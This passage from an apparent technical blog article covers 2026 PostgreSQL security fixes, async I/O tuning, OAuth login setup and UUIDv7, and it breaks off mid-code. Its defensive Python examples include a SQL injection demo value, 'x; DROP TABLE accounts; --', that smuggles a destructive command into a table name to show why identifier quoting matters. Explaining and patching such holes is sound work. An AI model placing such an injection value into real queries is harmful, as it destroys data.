&lt;span class="k"&gt;WHERE&lt;/span&gt;  &lt;span class="n"&gt;rolcanlogin&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;true&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt;  &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;auth_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Also check postgresql.conf and pg_hba.conf:&lt;/span&gt;
&lt;span class="c1"&gt;-- postgresql.conf: password_encryption = scram-sha-256&lt;/span&gt;
&lt;span class="c1"&gt;-- pg_hba.conf:     host all all 0.0.0.0/0 scram-sha-256&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
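
&lt;p&gt;A minimal Python sketch shows why a short-circuit compare leaks. The hash formulas follow PostgreSQL's documented MD5 scheme. The stored value is &lt;code&gt;"md5" + md5(password || username)&lt;/code&gt;, and the client response is &lt;code&gt;"md5" + md5(stored hex || salt)&lt;/code&gt;. &lt;code&gt;short_circuit_equal&lt;/code&gt; is a hypothetical model of the vulnerable pattern, not PostgreSQL's C code. &lt;code&gt;constant_time_equal&lt;/code&gt; shows the general remedy, not the exact 18.4 patch.&lt;/p&gt;

```python
import hashlib
import hmac


def pg_md5_stored(password: str, username: str) -> str:
    # Format of an md5 rolpassword: "md5" + md5(password || username)
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def pg_md5_response(stored: str, salt: bytes) -> str:
    # MD5 auth response: "md5" + md5(hex part of the stored hash || 4-byte salt)
    return "md5" + hashlib.md5(stored[3:].encode() + salt).hexdigest()


def short_circuit_equal(a: str, b: str) -> tuple[bool, int]:
    """Leaky comparison: returns (equal, characters_examined)."""
    if len(a) != len(b):
        return False, 0
    examined = 0
    for x, y in zip(a, b):
        examined += 1
        if x != y:
            # Early exit: work done (and so elapsed time) grows with the matching prefix
            return False, examined
    return True, examined


def constant_time_equal(a: str, b: str) -> bool:
    # hmac.compare_digest is designed so its timing does not reveal where inputs differ
    return hmac.compare_digest(a.encode(), b.encode())


print(short_circuit_equal("md5abcdef", "md5abXXXX"))  # (False, 6)
```

&lt;p&gt;The count returned by &lt;code&gt;short_circuit_equal&lt;/code&gt; stands in for elapsed time. An attacker who can measure it learns how many leading characters of a guess match the expected value. A constant-time comparison removes exactly that signal.&lt;/p&gt;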



&lt;h3&gt;
  
  
  2.3 CVE-2026-6479 — SSL/GSS Unbounded Recursion DoS
&lt;/h3&gt;

&lt;p&gt;Third is the &lt;strong&gt;no-auth-required DoS&lt;/strong&gt; in &lt;code&gt;CVE-2026-6479&lt;/code&gt;. An attacker who can reach the PostgreSQL socket can send a specific sequence of messages during SSL/GSS negotiation. The handler then falls into unbounded recursion and exhausts its stack, which kills backend processes. In the worst case it also exhausts the backend slot pool, so legitimate users cannot connect. &lt;strong&gt;RDS instances exposed to the internet on port 5432 with only VPC peering / IP allowlists&lt;/strong&gt; as guardrails, or misconfigured NodePort services, are the highest-risk targets. Short-term mitigation: limit who can reach the port at the network layer (security groups, firewall rules, &lt;code&gt;listen_addresses&lt;/code&gt;). SSL/GSS negotiation happens before &lt;code&gt;pg_hba.conf&lt;/code&gt; is evaluated, so tightening &lt;code&gt;hostssl&lt;/code&gt; / &lt;code&gt;hostgssenc&lt;/code&gt; lines alone does not block the trigger. Permanent fix: &lt;strong&gt;patch to 18.4 / 17.10 / 16.14 / 15.18 / 14.23&lt;/strong&gt;.&lt;/p&gt;
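
&lt;p&gt;Whichever layer enforces it, the short-term mitigation comes down to one question: can anything outside a trusted range reach port 5432? This minimal Python sketch assumes you have already exported the allowed source CIDRs into a list, for example from security-group or firewall rules. The &lt;code&gt;TRUSTED&lt;/code&gt; ranges are placeholder RFC 1918 networks, so substitute your own. The sketch checks against an explicit allowlist with &lt;code&gt;subnet_of()&lt;/code&gt; rather than relying on &lt;code&gt;is_private&lt;/code&gt;, whose handling of edge cases such as &lt;code&gt;0.0.0.0/0&lt;/code&gt; is easy to misread.&lt;/p&gt;

```python
import ipaddress

# Assumption: the ranges you trust to reach port 5432 (RFC 1918 space here; use your own)
TRUSTED = [ipaddress.ip_network(c) for c in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_trusted(cidr: str) -> bool:
    net = ipaddress.ip_network(cidr, strict=False)
    # subnet_of() raises TypeError across IP versions, so compare versions first
    return any(net.version == t.version and net.subnet_of(t) for t in TRUSTED)


def untrusted_sources(allowed_cidrs: list[str]) -> list[str]:
    """Return every allowed source range that is not inside a trusted network."""
    return [c for c in allowed_cidrs if not is_trusted(c)]


print(untrusted_sources(["10.1.0.0/16", "0.0.0.0/0", "203.0.113.5/32"]))
# ['0.0.0.0/0', '203.0.113.5/32']
```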

&lt;h3&gt;
  
  
  2.4 CVE-2026-6476 — ALTER SUBSCRIPTION REFRESH PUBLICATION SQL Injection
&lt;/h3&gt;

&lt;p&gt;Fourth is an SQL injection in &lt;strong&gt;logical replication&lt;/strong&gt;. When &lt;code&gt;ALTER SUBSCRIPTION ... REFRESH PUBLICATION&lt;/code&gt; runs, the subscriber re-fetches the publisher's table list and interpolates schema/relation names into SQL commands &lt;em&gt;without quoting&lt;/em&gt;. A subscriber owner who can control the publisher-side object names could execute arbitrary SQL on the publisher. 18.4 applies &lt;code&gt;quote_ident()&lt;/code&gt; consistently when constructing those commands. Multi-tenant SaaS environments that &lt;em&gt;separate publications per customer&lt;/em&gt; need to patch immediately.&lt;/p&gt;
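
&lt;p&gt;The fix pattern is easy to demonstrate. In this Python sketch, &lt;code&gt;quote_ident&lt;/code&gt; is a simplified re-implementation that always quotes, whereas PostgreSQL's &lt;code&gt;quote_ident()&lt;/code&gt; quotes only when needed. The &lt;code&gt;SELECT count(*)&lt;/code&gt; template is hypothetical, not the statement the subscriber actually builds.&lt;/p&gt;

```python
def quote_ident(name: str) -> str:
    """Simplified identifier quoting: wrap in double quotes, doubling any embedded quote."""
    return '"' + name.replace('"', '""') + '"'


def build_query_unsafe(schema: str, relname: str) -> str:
    # Vulnerable pattern: catalog names pasted straight into SQL text
    return f"SELECT count(*) FROM {schema}.{relname}"


def build_query_safe(schema: str, relname: str) -> str:
    # Fixed pattern: every identifier goes through quote_ident()
    return f"SELECT count(*) FROM {quote_ident(schema)}.{quote_ident(relname)}"


evil = "x; DROP TABLE accounts; --"
print(build_query_unsafe("public", evil))  # SELECT count(*) FROM public.x; DROP TABLE accounts; --
print(build_query_safe("public", evil))    # SELECT count(*) FROM "public"."x; DROP TABLE accounts; --"
```

&lt;p&gt;Always quoting is safe here because names read back from the catalog are exact. It even preserves mixed-case names that unquoted SQL would fold to lowercase.&lt;/p&gt;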

&lt;h2&gt;
  
  
  3. PostgreSQL 18's Async I/O — Measured Differences Between io_method Options
&lt;/h2&gt;

&lt;p&gt;The biggest architectural change in PostgreSQL 18 is the &lt;strong&gt;async I/O (AIO) subsystem&lt;/strong&gt;. Through 17, backend processes read disk pages synchronously — a page cache miss stalled the entire backend. 18 introduces the &lt;code&gt;io_method&lt;/code&gt; parameter so operators can choose between three dispatch strategies.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;code&gt;io_method&lt;/code&gt;&lt;/th&gt;
&lt;th&gt;Behavior&lt;/th&gt;
&lt;th&gt;Prerequisite&lt;/th&gt;
&lt;th&gt;Typical Effect (Read-Heavy)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;sync&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Synchronous reads, same as pre-18&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Baseline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;worker&lt;/code&gt; (default)&lt;/td&gt;
&lt;td&gt;Offload I/O to a dedicated worker process pool&lt;/td&gt;
&lt;td&gt;None (all OS)&lt;/td&gt;
&lt;td&gt;+20–30% on local SSD, +50–150% on network storage&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;io_uring&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Direct use of Linux 5.1+ &lt;code&gt;io_uring&lt;/code&gt; kernel interface&lt;/td&gt;
&lt;td&gt;Linux 5.1+, build with &lt;code&gt;--with-liburing&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Lower CPU overhead vs worker, +0–50% throughput depending on workload&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  3.1 Step 1: io_method=worker — Safe in Almost Every Environment
&lt;/h3&gt;

&lt;p&gt;The safest first step is &lt;code&gt;io_method=worker&lt;/code&gt;. It runs on every OS, doesn't depend on the kernel version, and doesn't require special build flags. A dedicated worker pool issues page prefetches and the backend polls for results. The effect is largest on &lt;strong&gt;network storage (AWS EBS, GCP Persistent Disk, Azure Managed Disk)&lt;/strong&gt;. Classmethod's RDS PostgreSQL 18 benchmark showed &lt;code&gt;worker&lt;/code&gt; mode delivering roughly 2–3x the sequential-scan read throughput of &lt;code&gt;sync&lt;/code&gt;. On local NVMe SSDs, where responses are already microsecond-class, the gain is closer to +20%.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# postgresql.conf — recommended baseline for io_method=worker
&lt;/span&gt;&lt;span class="py"&gt;io_method&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;worker            # default. enabled automatically in 18&lt;/span&gt;
&lt;span class="py"&gt;io_workers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;3                # worker process count, default 3&lt;/span&gt;
                              &lt;span class="c"&gt;# ⚠️ note: changing requires PostgreSQL restart
&lt;/span&gt;&lt;span class="py"&gt;effective_io_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;16 # bump prefetch depth alongside AIO&lt;/span&gt;
&lt;span class="py"&gt;maintenance_io_concurrency&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;32&lt;/span&gt;

&lt;span class="c"&gt;# Monitoring: dispatched I/O count from pg_stat_io view
# SELECT * FROM pg_stat_io WHERE backend_type = 'io worker';
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.2 Step 2: io_method=io_uring — CPU Efficiency on Linux 5.1+
&lt;/h3&gt;

&lt;p&gt;Once your workload stabilizes, the next step is &lt;code&gt;io_uring&lt;/code&gt;. Binaries built with &lt;code&gt;./configure --with-liburing&lt;/code&gt; (or official RHEL/Ubuntu packages) on Linux 5.1+ can enable it. io_uring places a shared ring buffer between PostgreSQL and the kernel, cutting syscall overhead. &lt;strong&gt;Because no worker pool is needed, CPU usage drops vs worker mode&lt;/strong&gt;, and high-concurrency OLTP workloads can squeeze additional throughput out. But container runtimes that block &lt;code&gt;io_uring&lt;/code&gt; syscalls via seccomp (Docker's default seccomp profile, some GKE Autopilot nodes) will fail immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Check kernel version&lt;/span&gt;
&lt;span class="nb"&gt;uname&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt;   &lt;span class="c"&gt;# must be 5.1+, 6.x recommended&lt;/span&gt;

&lt;span class="c"&gt;# 2) Verify liburing build option&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SHOW server_version;"&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SELECT name, setting FROM pg_settings WHERE name = 'io_method';"&lt;/span&gt;
&lt;span class="c"&gt;#  → 'io_uring' should appear as an allowed enum value&lt;/span&gt;

&lt;span class="c"&gt;# 3) Update postgresql.conf&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'io_method = io_uring'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /etc/postgresql/18/main/postgresql.conf
systemctl restart postgresql@18-main

&lt;span class="c"&gt;# 4) Verify io_uring dispatch from pg_stat_io&lt;/span&gt;
psql &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"SELECT * FROM pg_stat_io WHERE backend_type = 'client backend';"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
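
&lt;p&gt;The prerequisites above can be folded into a pre-flight check before anyone edits &lt;code&gt;postgresql.conf&lt;/code&gt;. This is a hypothetical Python helper, not a PostgreSQL tool. It assumes you already know whether the binary was built with liburing (for example, from the &lt;code&gt;enumvals&lt;/code&gt; column for &lt;code&gt;io_method&lt;/code&gt; in &lt;code&gt;pg_settings&lt;/code&gt;) and whether your container's seccomp profile blocks &lt;code&gt;io_uring&lt;/code&gt;. It applies the Linux 5.1+ floor stated above.&lt;/p&gt;

```python
import re


def kernel_version(release: str) -> tuple[int, int]:
    """Parse (major, minor) from a `uname -r` string such as '6.8.0-45-generic'."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if m is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2))


def choose_io_method(system: str, release: str, built_with_liburing: bool,
                     seccomp_blocks_io_uring: bool) -> str:
    """Hypothetical helper: pick io_uring only when every prerequisite holds, else stay on worker."""
    if system != "Linux" or not built_with_liburing or seccomp_blocks_io_uring:
        return "worker"
    return "io_uring" if kernel_version(release) >= (5, 1) else "worker"


print(choose_io_method("Linux", "6.8.0-45-generic", True, False))       # io_uring
print(choose_io_method("Linux", "4.18.0-513.el8.x86_64", True, False))  # worker
```

&lt;p&gt;On a real host you would pass &lt;code&gt;platform.system()&lt;/code&gt; and &lt;code&gt;platform.release()&lt;/code&gt;. Falling back to &lt;code&gt;worker&lt;/code&gt; on any doubt matches the article's advice that &lt;code&gt;worker&lt;/code&gt; is the safe default.&lt;/p&gt;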



&lt;h3&gt;
  
  
  3.3 Scope and Limits of AIO
&lt;/h3&gt;

&lt;p&gt;A key constraint: PostgreSQL 18 AIO covers &lt;strong&gt;reads only&lt;/strong&gt;. WAL writes and checkpoint dirty-page flushes still take the synchronous path. As a result, (a) &lt;em&gt;read-heavy analytic workloads&lt;/em&gt; see the largest gains, from sequential scans, bitmap heap scans, and &lt;code&gt;VACUUM&lt;/code&gt;, while (b) &lt;em&gt;write-heavy OLTP barely moves&lt;/em&gt;. &lt;code&gt;shared_buffers&lt;/code&gt; also needs to be sized for the workload: if pages get evicted right after they are prefetched, AIO can't help.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. OAuth 2.0 Native Authentication — Direct IdP Integration in pg_hba.conf
&lt;/h2&gt;

&lt;p&gt;The second major change in 18 is that &lt;strong&gt;OAuth 2.0 is a first-class authentication method in &lt;code&gt;pg_hba.conf&lt;/code&gt;&lt;/strong&gt;. Previously, the options for delegating authentication included LDAP, RADIUS, SSPI, and PAM. Token-based logins needed an external authentication proxy or a cloud-specific scheme such as AWS RDS IAM authentication. 18 adds &lt;code&gt;oauth&lt;/code&gt; as a method, so the server itself accepts bearer tokens issued by IdPs (Okta, Microsoft Entra ID, Keycloak, Auth0, Google) and hands them to a validator module for verification.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 pg_hba.conf Baseline Patterns
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/postgresql/18/main/pg_hba.conf
# TYPE   DATABASE   USER   ADDRESS        METHOD   OPTIONS
&lt;/span&gt;
&lt;span class="c"&gt;# OAuth — Keycloak realm 'manoit'
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;myapp&lt;/span&gt;      &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit"&lt;/span&gt; &lt;span class="s"&gt;scope="openid profile email" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# OAuth — Microsoft Entra ID (tenant ID required, custom scope)
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;analytics&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://login.microsoftonline.com/{tenant-id}/v2.0"&lt;/span&gt; &lt;span class="s"&gt;scope="api://{client-id}/.default" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# OAuth — Okta org
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;reporting&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;    &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;oauth&lt;/span&gt;    &lt;span class="py"&gt;issuer&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s"&gt;"https://manoit.okta.com/oauth2/default"&lt;/span&gt; &lt;span class="s"&gt;scope="openid offline_access" map=oauth_map&lt;/span&gt;

&lt;span class="c"&gt;# Keep scram-sha-256 as backward-compat (emergency access)
&lt;/span&gt;&lt;span class="err"&gt;hostssl&lt;/span&gt;  &lt;span class="err"&gt;all&lt;/span&gt;        &lt;span class="err"&gt;admin&lt;/span&gt;  &lt;span class="err"&gt;10.0.0.0/8&lt;/span&gt;     &lt;span class="err"&gt;scram-sha-256&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Key parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;issuer=&lt;/code&gt; — IdP issuer URL. OAuth is &lt;strong&gt;strict about issuer matching&lt;/strong&gt; down to case and trailing slashes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;scope=&lt;/code&gt; — Requested scope. Entra ID's default scope does not work; you need a custom one like &lt;code&gt;api://{client-id}/.default&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;map=&lt;/code&gt; — A mapping name in &lt;code&gt;pg_ident.conf&lt;/code&gt; that converts external identity (&lt;code&gt;alice@manoit.co.kr&lt;/code&gt;) into a PostgreSQL role (&lt;code&gt;alice&lt;/code&gt;).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4.2 pg_ident.conf Mapping Patterns
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# /etc/postgresql/18/main/pg_ident.conf
# MAPNAME       SYSTEM-USERNAME              PG-USERNAME
&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;/^(.+)@manoit\.co\.kr$&lt;/span&gt;       &lt;span class="err"&gt;\1&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;alice@partner.com&lt;/span&gt;            &lt;span class="err"&gt;partner_alice&lt;/span&gt;
&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;admin@manoit.co.kr&lt;/span&gt;           &lt;span class="err"&gt;postgres&lt;/span&gt;   &lt;span class="c"&gt;# superuser mapping (literal match, so no backslash escapes)
&lt;/span&gt;&lt;span class="err"&gt;oauth_map&lt;/span&gt;       &lt;span class="err"&gt;/^svc-(.+)@manoit\.co\.kr$&lt;/span&gt;   &lt;span class="err"&gt;svc_\1&lt;/span&gt;     &lt;span class="c"&gt;# service account pattern
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
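
&lt;p&gt;How the map is evaluated is easy to get wrong, so here is a minimal Python sketch of the matching rules, simplified from the &lt;code&gt;pg_ident.conf&lt;/code&gt; rules in the PostgreSQL documentation: a SYSTEM-USERNAME starting with &lt;code&gt;/&lt;/code&gt; is a regular expression, any other value is compared literally, and &lt;code&gt;\1&lt;/code&gt; in PG-USERNAME is replaced by the first capture group. A login is allowed if &lt;em&gt;any&lt;/em&gt; line pairs the external identity with the requested role. The function &lt;code&gt;ident_allows&lt;/code&gt; and the in-memory map are hypothetical, and features such as regex PG-USERNAME fields and the &lt;code&gt;all&lt;/code&gt; keyword are left out.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import re

# Hypothetical in-memory copy of the oauth_map entries:
# (SYSTEM-USERNAME field, PG-USERNAME field).
OAUTH_MAP = [
    (r"/^(.+)@manoit\.co\.kr$", r"\1"),
    ("alice@partner.com", "partner_alice"),
    # Non-regex fields are compared literally, so this one must not contain backslashes.
    ("admin@manoit.co.kr", "postgres"),
    (r"/^svc-(.+)@manoit\.co\.kr$", r"svc_\1"),
]


def ident_allows(map_lines, system_user, pg_user):
    """Return True if any map line lets system_user connect as pg_user."""
    for sys_field, pg_field in map_lines:
        if sys_field.startswith("/"):
            # Regex entry: match the external identity, then substitute \1.
            match = re.search(sys_field[1:], system_user)
            if match is None:
                continue
            expected = pg_field
            if match.groups():
                expected = pg_field.replace(r"\1", match.group(1))
        elif sys_field == system_user:
            # Literal entry: exact string comparison.
            expected = pg_field
        else:
            continue
        if expected == pg_user:
            return True
    return False


print(ident_allows(OAUTH_MAP, "svc-billing@manoit.co.kr", "svc_billing"))  # True
print(ident_allows(OAUTH_MAP, "alice@partner.com", "alice"))               # False
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because the map is a relation rather than a function, &lt;code&gt;svc-billing@manoit.co.kr&lt;/code&gt; is accepted as &lt;code&gt;svc_billing&lt;/code&gt; through the fourth line, and also as &lt;code&gt;svc-billing&lt;/code&gt; through the first line if such a role exists. Order the patterns with that overlap in mind.&lt;/p&gt;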



&lt;h3&gt;
  
  
  4.3 Validator Module Is Required
&lt;/h3&gt;

&lt;p&gt;Important: &lt;strong&gt;PostgreSQL 18 core ships without an OAuth validator&lt;/strong&gt;. Core provides the protocol handler and token validation framework; actual signature verification and claim mapping happen in a separate module. Percona's &lt;code&gt;pg_oidc_validator&lt;/code&gt; is the most widely used open-source option, while commercial distributions (EnterpriseDB, Crunchy Data) bundle their own.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="c"&gt;# postgresql.conf — load the validator library
&lt;/span&gt;&lt;span class="py"&gt;oauth_validator_libraries&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;'pg_oidc_validator'&lt;/span&gt;

&lt;span class="c"&gt;# pg_oidc_validator.conf (module-specific settings)
&lt;/span&gt;&lt;span class="nn"&gt;[manoit]&lt;/span&gt;
&lt;span class="py"&gt;issuer&lt;/span&gt;       &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit"&lt;/span&gt;
&lt;span class="py"&gt;jwks_uri&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"https://idp.manoit.co.kr/realms/manoit/protocol/openid-connect/certs"&lt;/span&gt;
&lt;span class="py"&gt;audience&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"postgresql"&lt;/span&gt;
&lt;span class="py"&gt;require_iss&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;require_aud&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;true&lt;/span&gt;
&lt;span class="py"&gt;clock_skew_seconds&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;60&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
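
&lt;p&gt;Signature verification against &lt;code&gt;jwks_uri&lt;/code&gt; is the validator's job and is not reproduced here, but the &lt;code&gt;require_iss&lt;/code&gt; / &lt;code&gt;require_aud&lt;/code&gt; checks are simple enough to sketch. The Python below is a hypothetical illustration (&lt;code&gt;check_iss_aud&lt;/code&gt; is not part of &lt;code&gt;pg_oidc_validator&lt;/code&gt;); it assumes the token has already been decoded and its signature verified, and it omits the &lt;code&gt;exp&lt;/code&gt;/&lt;code&gt;nbf&lt;/code&gt; checks that &lt;code&gt;clock_skew_seconds&lt;/code&gt; relaxes.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;ISSUER = "https://idp.manoit.co.kr/realms/manoit"
AUDIENCE = "postgresql"


def check_iss_aud(claims, expected_issuer, expected_audience):
    """Return a list of problems in already-decoded, signature-checked JWT claims."""
    problems = []
    # Exact string comparison: no case folding, no trailing-slash trimming.
    if claims.get("iss") != expected_issuer:
        problems.append("iss mismatch")
    # RFC 7519 allows "aud" to be a single string or a list of strings.
    aud = claims.get("aud") or []
    audiences = [aud] if isinstance(aud, str) else list(aud)
    if expected_audience not in audiences:
        problems.append("aud mismatch")
    return problems


print(check_iss_aud({"iss": ISSUER, "aud": AUDIENCE}, ISSUER, AUDIENCE))          # []
print(check_iss_aud({"iss": ISSUER + "/", "aud": [AUDIENCE]}, ISSUER, AUDIENCE))  # ['iss mismatch']
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The second call shows why issuer strings should be copied verbatim from the IdP's discovery document: a single trailing slash is enough to reject an otherwise valid token.&lt;/p&gt;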



&lt;h3&gt;
  
  
  4.4 Client Connection
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Requires libpq from PostgreSQL 18 or later (psql 18+)&lt;/span&gt;
psql &lt;span class="s2"&gt;"host=db.manoit.co.kr port=5432 dbname=myapp user=alice &lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  oauth_issuer=https://idp.manoit.co.kr/realms/manoit &lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  oauth_client_id=postgres-client &lt;/span&gt;&lt;span class="se"&gt;\&lt;/span&gt;&lt;span class="s2"&gt;
  sslmode=require"&lt;/span&gt;
&lt;span class="c"&gt;# Keyword/value form: whitespace between settings is harmless, unlike inside a URI.&lt;/span&gt;
&lt;span class="c"&gt;# libpq's built-in flow is the OAuth device authorization grant: open the printed URL and enter the code.&lt;/span&gt;
&lt;span class="c"&gt;# Once issued, the token is sent to the PostgreSQL backend, where the validator module checks it.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  5. UUIDv7 — Timestamp-Ordered UUIDs as a First-Class Citizen
&lt;/h2&gt;

&lt;p&gt;UUIDs have become the standard for globally unique IDs, but classical &lt;strong&gt;UUIDv4 is fully random&lt;/strong&gt;: each new key lands on a random B-Tree leaf page, so inserts dirty pages all over the index, inflating WAL volume and cache misses. PostgreSQL 18 adds &lt;strong&gt;&lt;code&gt;uuidv7()&lt;/code&gt;&lt;/strong&gt; as a built-in function. UUIDv7 (RFC 9562) puts the Unix epoch timestamp in milliseconds into the first 48 bits and fills the remaining bits with the version, the variant, and random data, producing UUIDs that &lt;em&gt;sort by creation time&lt;/em&gt;.&lt;/p&gt;
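
&lt;p&gt;To make the layout concrete, here is a minimal Python sketch that assembles a UUIDv7-shaped value by hand (48-bit millisecond timestamp, version nibble &lt;code&gt;7&lt;/code&gt;, RFC 9562 variant bits, random remainder) and reads the timestamp back, which is what &lt;code&gt;uuid_extract_timestamp()&lt;/code&gt; does server-side. The helper names are hypothetical, and PostgreSQL's own &lt;code&gt;uuidv7()&lt;/code&gt; may use part of the random section for extra timestamp precision, so treat this as an illustration of the bit layout rather than of PostgreSQL's implementation.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import os
import time
import uuid


def uuid7_sketch(ts_ms=None):
    """Build a UUIDv7-shaped value: 48-bit Unix-ms timestamp + version/variant + random."""
    if ts_ms is None:
        ts_ms = time.time_ns() // 1_000_000
    # Bytes 0-5: big-endian milliseconds since the Unix epoch; bytes 6-15: random.
    raw = bytearray(ts_ms.to_bytes(6, "big") + os.urandom(10))
    raw[6] = 0x70 + raw[6] % 16  # high nibble of byte 6 = version 7
    raw[8] = 0x80 + raw[8] % 64  # top two bits of byte 8 = variant 0b10
    return uuid.UUID(bytes=bytes(raw))


def extract_ms(u):
    """Read the embedded millisecond timestamp back out of the first 48 bits."""
    return int.from_bytes(u.bytes[:6], "big")


earlier = uuid7_sketch(1_780_000_000_000)
later = uuid7_sketch(1_780_000_000_001)
print(earlier.version, extract_ms(earlier))          # 7 1780000000000
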